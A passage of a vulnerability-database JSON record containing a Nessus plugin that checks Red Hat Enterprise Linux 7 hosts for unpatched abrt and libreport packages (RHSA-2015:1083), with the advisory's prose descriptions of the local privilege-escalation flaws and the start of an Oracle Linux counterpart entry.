"p-cpe:/a:redhat:enterprise_linux:abrt-gui-libs", "p-cpe:/a:redhat:enterprise_linux:abrt-libs", "p-cpe:/a:redhat:enterprise_linux:abrt-python", "p-cpe:/a:redhat:enterprise_linux:abrt-python-doc", "p-cpe:/a:redhat:enterprise_linux:abrt-retrace-client", "p-cpe:/a:redhat:enterprise_linux:abrt-tui", "p-cpe:/a:redhat:enterprise_linux:libreport", "p-cpe:/a:redhat:enterprise_linux:libreport-anaconda", "p-cpe:/a:redhat:enterprise_linux:libreport-cli", "p-cpe:/a:redhat:enterprise_linux:libreport-compat", "p-cpe:/a:redhat:enterprise_linux:libreport-debuginfo", "p-cpe:/a:redhat:enterprise_linux:libreport-devel", "p-cpe:/a:redhat:enterprise_linux:libreport-filesystem", "p-cpe:/a:redhat:enterprise_linux:libreport-gtk", "p-cpe:/a:redhat:enterprise_linux:libreport-gtk-devel", "p-cpe:/a:redhat:enterprise_linux:libreport-newt", "p-cpe:/a:redhat:enterprise_linux:libreport-plugin-bugzilla", "p-cpe:/a:redhat:enterprise_linux:libreport-plugin-kerneloops", "p-cpe:/a:redhat:enterprise_linux:libreport-plugin-logger", "p-cpe:/a:redhat:enterprise_linux:libreport-plugin-mailx", "p-cpe:/a:redhat:enterprise_linux:libreport-plugin-reportuploader", "p-cpe:/a:redhat:enterprise_linux:libreport-plugin-rhtsupport", "p-cpe:/a:redhat:enterprise_linux:libreport-plugin-ureport", "p-cpe:/a:redhat:enterprise_linux:libreport-python", "p-cpe:/a:redhat:enterprise_linux:libreport-rhel", "p-cpe:/a:redhat:enterprise_linux:libreport-rhel-anaconda-bugzilla", "p-cpe:/a:redhat:enterprise_linux:libreport-rhel-bugzilla", "p-cpe:/a:redhat:enterprise_linux:libreport-web", "p-cpe:/a:redhat:enterprise_linux:libreport-web-devel", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.1", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2015-1083.NASL", "href": "https://www.tenable.com/plugins/nessus/84077", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1083. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84077);\n script_version(\"2.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2015-1869\", \"CVE-2015-1870\", \"CVE-2015-3142\", \"CVE-2015-3147\", \"CVE-2015-3150\", \"CVE-2015-3151\", \"CVE-2015-3159\", \"CVE-2015-3315\");\n script_bugtraq_id(75116, 75117, 75118, 75119, 75122, 75124, 75128, 75129);\n script_xref(name:\"RHSA\", value:\"2015:1083\");\n\n script_name(english:\"RHEL 7 : abrt (RHSA-2015:1083)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated abrt packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nABRT (Automatic Bug Reporting Tool) is a tool to help users to detect\ndefects in applications and to create a bug report with all the\ninformation needed by a maintainer to fix it. It uses a plug-in system\nto extend its functionality.\n\nIt was found that ABRT was vulnerable to multiple race condition and\nsymbolic link flaws. A local attacker could use these flaws to\npotentially escalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided\nby ABRT wrote core dumps to files owned by other system users. This\ncould result in information disclosure if an application crashed while\nits current directory was a directory writable to by other users (such\nas /tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by\nABRT did not handle symbolic links correctly. A local attacker with\nwrite access to an ABRT problem directory could use this flaw to\nescalate their privileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy\nof an sosreport file in ABRT problem directories, and included\nexcerpts of /var/log/messages selected by the user-controlled process\nname, leading to an information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain\ndirectories, abrt-handle-upload did not verify that the new problem\ndirectory had appropriate permissions and did not contain symbolic\nlinks. An attacker able to create a crafted problem report could use\nthis flaw to expose other parts of ABRT to attack, or to overwrite\narbitrary files on the system. (CVE-2015-3147)\n\nMultiple directory traversal flaws were found in the abrt-dbus D-Bus\nservice. A local attacker could use these flaws to read and write\narbitrary files as the root user. (CVE-2015-3151)\n\nIt was discovered that the abrt-dbus D-Bus service did not properly\ncheck the validity of the problem directory argument in the\nChownProblemDir, DeleteElement, and DeleteProblem methods. A local\nattacker could use this flaw to take ownership of arbitrary files and\ndirectories, or to delete files and directories as the root user.\n(CVE-2015-3150)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache\nhelper program did not properly filter the process environment before\ninvoking abrt-action-install-debuginfo. A local attacker could use\nthis flaw to escalate their privileges on the system. (CVE-2015-3159)\n\nAll users of abrt are advised to upgrade to these updated packages,\nwhich correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1083\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1870\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3150\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3151\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3142\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1869\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3147\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3159\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:X/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ABRT raceabrt Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-addon-ccpp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-addon-kerneloops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-addon-pstoreoops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-addon-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-addon-upload-watch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-addon-vmcore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-addon-xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-console-notification\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-dbus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-gui-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-gui-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-python-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-retrace-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-tui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-anaconda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-gtk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-newt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-plugin-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-plugin-kerneloops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-plugin-logger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-plugin-mailx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-plugin-reportuploader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-plugin-rhtsupport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-plugin-ureport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-rhel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-rhel-anaconda-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-rhel-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-web-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1083\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-addon-ccpp-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-addon-ccpp-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-addon-kerneloops-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-addon-kerneloops-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-addon-pstoreoops-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-addon-pstoreoops-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-addon-python-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-addon-python-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-addon-upload-watch-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-addon-upload-watch-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-addon-vmcore-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-addon-vmcore-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-addon-xorg-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-addon-xorg-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-cli-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-cli-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-console-notification-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-console-notification-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-dbus-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-dbus-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"abrt-debuginfo-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-desktop-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-desktop-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"abrt-devel-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-gui-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-gui-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"abrt-gui-devel-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"abrt-gui-libs-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"abrt-libs-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-python-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-python-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"abrt-python-doc-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-retrace-client-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-retrace-client-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"abrt-tui-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"abrt-tui-2.1.11-22.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"libreport-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-anaconda-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-anaconda-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-cli-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-cli-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-compat-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-compat-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"libreport-debuginfo-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"libreport-devel-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-filesystem-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-filesystem-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"libreport-gtk-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"libreport-gtk-devel-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-newt-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-newt-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-plugin-bugzilla-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-plugin-bugzilla-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-plugin-kerneloops-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-plugin-kerneloops-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-plugin-logger-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-plugin-logger-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-plugin-mailx-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-plugin-mailx-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-plugin-reportuploader-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-plugin-reportuploader-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-plugin-rhtsupport-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-plugin-rhtsupport-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-plugin-ureport-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-plugin-ureport-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-python-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-python-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-rhel-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-rhel-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-rhel-anaconda-bugzilla-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-rhel-anaconda-bugzilla-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"libreport-rhel-bugzilla-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libreport-rhel-bugzilla-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"libreport-web-2.1.11-23.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"libreport-web-devel-2.1.11-23.el7_1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"abrt / abrt-addon-ccpp / abrt-addon-kerneloops / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:57:15", "description": "From Red Hat Security Advisory 2015:1083 :\n\nUpdated abrt packages that fix multiple security issues are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nABRT (Automatic Bug Reporting Tool) is a tool to help users to detect defects in applications and to create a bug report with all the information needed by a maintainer to fix it. It uses a plug-in system to extend its functionality.\n\nIt was found that ABRT was vulnerable to multiple race condition and symbolic link flaws. A local attacker could use these flaws to potentially escalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided by ABRT wrote core dumps to files owned by other system users. This could result in information disclosure if an application crashed while its current directory was a directory writable to by other users (such as /tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by ABRT did not handle symbolic links correctly. A local attacker with write access to an ABRT problem directory could use this flaw to escalate their privileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy of an sosreport file in ABRT problem directories, and included excerpts of /var/log/messages selected by the user-controlled process name, leading to an information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain directories, abrt-handle-upload did not verify that the new problem directory had appropriate permissions and did not contain symbolic links. An attacker able to create a crafted problem report could use this flaw to expose other parts of ABRT to attack, or to overwrite arbitrary files on the system. (CVE-2015-3147)\n\nMultiple directory traversal flaws were found in the abrt-dbus D-Bus service. A local attacker could use these flaws to read and write arbitrary files as the root user. (CVE-2015-3151)\n\nIt was discovered that the abrt-dbus D-Bus service did not properly check the validity of the problem directory argument in the ChownProblemDir, DeleteElement, and DeleteProblem methods. A local attacker could use this flaw to take ownership of arbitrary files and directories, or to delete files and directories as the root user.\n(CVE-2015-3150)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache helper program did not properly filter the process environment before invoking abrt-action-install-debuginfo. A local attacker could use this flaw to escalate their privileges on the system. (CVE-2015-3159)\n\nAll users of abrt are advised to upgrade to these updated packages, which correct these issues.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-06-10T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : abrt (ELSA-2015-1083)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3147", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2021-01-14T00:00:00", 